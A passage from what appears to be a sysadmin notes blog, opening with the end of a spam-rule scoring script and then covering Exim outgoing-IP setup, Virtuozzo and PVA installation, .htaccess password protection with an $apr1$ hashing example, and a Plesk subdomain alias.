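            rule["regex"] = re.compile(m.group(1), flags)   # unanchored: matches substrings
        elif kind == "score":
            rule["score"] = float(rest.split()[0])           # first of up to four score values
        elif kind == "describe":
            rule["describe"] = rest
    return rules


def score_body(body, rules):
    """Return (total_score, [names of rules that hit]) for a message body."""
    total, hits = 0.0, []
    for name, rule in rules.items():
        if rule["regex"] is not None and rule["regex"].search(body):
            hits.append(name)
            total += rule["score"]
    return round(total, 3), hits


if __name__ == "__main__":
    rules = parse_rules(RULES_TEXT)
    for body in ("attest that this is testing", "TEST only", "test: Free Money"):
        total, hits = score_body(body, rules)
        print(f"{body!r}: score {total}, hits {hits}")
```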


Changing Exim interface IP !!

In order to change the exim interface IP, do the following :

Edit /etc/mailips: this file controls the IP address from which each domain
sends mail. Create and open the /etc/mailips file with your preferred text editor,
and configure it in the following way:

*: 192.168.0.1 (<- desired IP )

Disable this option, which is currently "on":

WHM » Service Configuration » Exim Configuration Manager » Domains and IPs »
Send mail from account's dedicated IP address

And enable this option,

Reference /etc/mailips for outgoing SMTP connections.

And now, restart the exim service.

Virtuozzo – Basics

Virtuozzo is a software application for enterprise server virtualization that allows an administrator to create virtual environments on a host computer at the operating system (OS) layer. Instead of having one physical machine run multiple operating systems simultaneously, as in the virtual machine model used by VMware, Virtuozzo approaches virtualization by running a single OS kernel as its core and exporting that core functionality to various partitions on the host.

Each of the partitions effectively becomes a stand-alone entity called a virtual private server (VPS).

Installation on a CentOS box:
Before proceeding with the installation of Virtuozzo, make sure you have the /vz partition, or
create it if you are installing on a fresh server.

/vz contains all container data and the Parallels Virtuozzo Containers templates.

INSTALLATION
Download the vzinstall-linux-x86_64.bin utility from the official site.
Make the script executable with # chmod a+x vzinstall-linux-x86_64.bin
Run the script with # ./vzinstall-linux-x86_64.bin

You will get the following wizard:
You can either download and install now, or download only, for a later installation or for another computer.
The configure options allow you to configure the various parameters that the Virtuozzo
containers use during execution. If you select the download-only option, once the download is over go to the download directory (root/virtuzzo/Download), copy the contents of this directory to the system where you plan to install Virtuozzo and execute the following script:

# ./virtuozzo-4.7.0-<build_version>-x86_64.sfx

If you select download and install, you can do it in one of 3 ways:
Default: Select this radio button to download and install the Parallels Virtuozzo Containers program files and one OS template, CentOS 5 (you will need this OS template to create Containers on its basis).

Full: Select this radio button to download all available OS templates to the server and install them there.

Custom: Select this radio button to customize the set of OS templates to download to and install on the server. In this case, once you click the Next button, you will see the Select Templates window where you can choose the necessary OS templates for downloading

In the next step of the wizard, click Download to start downloading Parallels Virtuozzo Containers and the selected templates to the server.

In the next step you would be asked for the license key.

Install a valid Parallels license by entering the license key number in the field provided and clicking Next. If you plan to activate Parallels Virtuozzo Containers with an activation code, make sure that your server is connected to the Internet.

Finally, the installation program displays the Congratulations window.

Leave the Install PVA Agent and Install PVA Management Node check boxes selected to set up the Parallels Virtual Automation application and its components on the server once you restart it. With Parallels Virtual Automation, you can connect to the server and manage Containers using your favorite browser. If you select both check boxes, the installer does the following after restarting the server:

1. Downloads the installation packages for Parallels Virtual Automation from the Parallels website.

2. Installs the PVA Agent component on the server. PVA Agent ensures the interaction between your server, the Management Node (see below), and Parallels Virtual Automation. Without this component installed, you will not be able to connect to your server using Parallels Virtual Automation.

3. Creates a special Container on the server and installs the PVA Management Node component inside it. PVA Management Node (also called Master Server) ensures the communication between the server running Parallels Virtuozzo Containers (known as Slave Server) and the Parallels Virtual Automation application. The Master Server keeps a database with the information about all registered Slave Servers.

If you have already set up a Master Server, you can skip this step (clear the Install PVA Management Node check box).

After this step you will be asked for the IP address, hostname and DNS of the container which will act as the PVA Management Node.

To log in to Parallels Virtual Automation, launch a Web browser compatible with PVA. The list of currently supported Web browsers is given below:

• Internet Explorer 6.0 and above
• Firefox 2.x and above
• Safari 3.x and above

On the Master Server or any other computer, open your favorite Web browser and log in to Parallels Virtual Automation by typing the Master Server IP address or hostname and TCP port 4648 in the address bar.

http://ipaddressofpvm:4648
Log in using the username and password of the container which acts as the PVA Management Node.

Manually setting up PVA and the management node
Create the container:
# vzctl create CTID --ostemplate centos-6-x86_64 --hostname "hostname"
Set the IP address and nameserver for the created container, which will act as the MN (Management Node).

# vzctl start CTID
# vzpkg install CTID -p perl-DBI

Download PVA Management Node installer

# wget http://download.pa.parallels.com/pva/pv ... loy.x86_64
# chmod a+x pva-setup-deploy.x86_64
# ./pva-setup-deploy.x86_64 -d /vz/root/CTID/root/ --extract
# vzctl enter CTID
# cd /root
# ./pva-setup --install

.htaccess files – Basics

A small note on .htaccess file.

What is .htaccess?

.htaccess is a per-directory configuration file for web servers running the Apache Web Server. When an .htaccess file is placed in a directory, the web server detects it and applies its directives to that directory. These .htaccess files are used to alter the configuration of the Apache Web Server to enable or disable additional functionality and features that the Apache Web Server software has to offer.

A sample .htaccess file :

AuthName "security check"
AuthUserFile /path/to/password/file/.htpasswd
AuthType Basic
require valid-user
ErrorDocument 401 /error_pages/401.html

The above .htaccess file enables password protection on the directory, and it redirects to a custom error page if a user fails to log in correctly.

This is just a basic example.

.htaccess files are very powerful and they can be extremely fine tuned to meet your needs.
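As an added example (not part of the original post), the following shows how the entries in the AuthUserFile referenced above are built and checked. It implements the $apr1$ (Apache MD5-crypt) scheme that htpasswd -m writes, using only Python's standard library; the .htpasswd body is constructed here, and the function names (apr1_hash, make_htpasswd_line, verify_htpasswd) are this example's own. Where your Apache build supports it, prefer htpasswd -B (bcrypt) over this legacy scheme.

```python
import hashlib
import hmac
import secrets

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"  # htpasswd to64() alphabet

def _to64(value, count):
    # Emit `count` characters, least significant 6 bits first (not standard base64).
    return "".join(_ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))

def apr1_hash(password, salt):
    """Return the $apr1$<salt>$<22 chars> string that 'htpasswd -m' stores."""
    pw, sl = password.encode(), salt.encode()
    ctx = hashlib.md5(pw + b"$apr1$" + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for n in range(len(pw), 0, -16):          # one byte of alt per password byte
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:                                  # walk the bits of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for r in range(1000):                     # stretching rounds, as in apr_md5_encode()
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3: c.update(sl)
        if r % 7: c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return f"$apr1${salt}${out}{_to64(final[11], 2)}"

def make_htpasswd_line(user, password):
    # One 'user:hash' line with a fresh random 8-character salt.
    salt = "".join(secrets.choice(_ITOA64) for _ in range(8))
    return f"{user}:{apr1_hash(password, salt)}"

def verify_htpasswd(htpasswd_text, user, password):
    """Check a login against an .htpasswd body; only $apr1$ entries are handled."""
    for line in htpasswd_text.splitlines():
        name, sep, stored = line.partition(":")
        if not sep or name != user or not stored.startswith("$apr1$"):
            continue
        salt = stored.split("$")[2]
        # Constant-time compare so response timing does not leak how much of the hash matched.
        return hmac.compare_digest(apr1_hash(password, salt), stored)
    return False

# Constructed sample .htpasswd body (example credentials only, not a real store).
SAMPLE_HTPASSWD = "\n".join([make_htpasswd_line("alice", "correct horse battery"), make_htpasswd_line("bob", "s3cret")])
```

Keep the file named by AuthUserFile outside the DocumentRoot, as the sample .htaccess above does with /path/to/password/file/.htpasswd, so it cannot be fetched over HTTP.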

An alias to a subdomain ? — Plesk

Need a domain alias for a sub-domain?
Plesk had a direct option to do this from the front end, which was taken out in newer versions of Plesk.

You can configure a .com alias to a subdomain by creating a file in the subdomain's conf directory like this:
# vi /var/www/vhost/yoursite.com/subdomains/foo/conf/vhost.conf

contents:
ServerAlias "newaliasname.com"
ServerAlias "www.newaliasname.com"

then rebuild the Apache config like:
# /opt/psa/admin/sbin/httpdmng --reconfigure-all